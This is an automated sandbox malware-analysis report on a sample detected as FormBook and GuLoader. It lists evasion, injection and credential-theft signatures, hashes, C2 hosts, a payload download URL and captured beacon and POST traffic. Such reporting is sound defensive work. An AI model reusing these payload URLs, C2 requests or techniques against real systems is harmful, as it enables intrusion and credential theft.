Windows Analysis Report
160420241245287.exe

Overview

General Information

Sample name: 160420241245287.exe
Analysis ID: 1426828
MD5: 0faf0632777806d9e8c13f1ca6fc3237
SHA1: 35fea792d63ba1e9deec1d2988bc6456322772d5
SHA256: 4585d06cb13de01241bf014db8d49149de7a77a9a0dc13b9007d08a402a035b3
Tags: exe
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://103.14.155.180/CkkRLCTUxW193.bin Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for submitted file
Source: 160420241245287.exe Virustotal: Detection: 18% Perma Link
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 160420241245287.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 160420241245287.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5~ source: powershell.exe, 00000001.00000002.2060432087.000000000767E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887014647.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2886634622.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Untapestried.exe, Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: cmd.pdb source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 00000001.00000002.2060432087.0000000007705000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405772
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_0040622D FindFirstFileW,FindClose, 0_2_0040622D
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0284B880 FindFirstFileW,FindNextFileW,FindClose, 12_2_0284B880
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then xor eax, eax 12_2_02839430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 12_2_02841DAF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 12_2_02841DD0

Networking
barindex
Performs DNS queries to domains with low reputation
Source: DNS query: www.eternalsunrise.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.14.155.180 103.14.155.180
Source: Joe Sandbox View IP Address: 219.94.128.41 219.94.128.41
Source: Joe Sandbox View IP Address: 66.29.135.159 66.29.135.159
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: global traffic HTTP traffic detected: GET /CkkRLCTUxW193.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.14.155.180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.n-benriya002.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.scwspark.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: unknown DNS traffic detected: queries for: www.ejbodyart.com
Source: unknown HTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4Data Raw: 65 64 52 30 68 46 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 71 74 34 4d 50 46 2f 30 70 73 4e 74 30 70 79 5a 54 38 49 41 70 77 56 78 54 6a 76 78 51 70 6a 31 51 3d 3d Data Ascii: edR0hF=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 16 Apr 2024 15:17:16 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 16 Apr 2024 15:17:18 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 16 Apr 2024 15:17:21 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Tue, 16 Apr 2024 15:17:24 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" 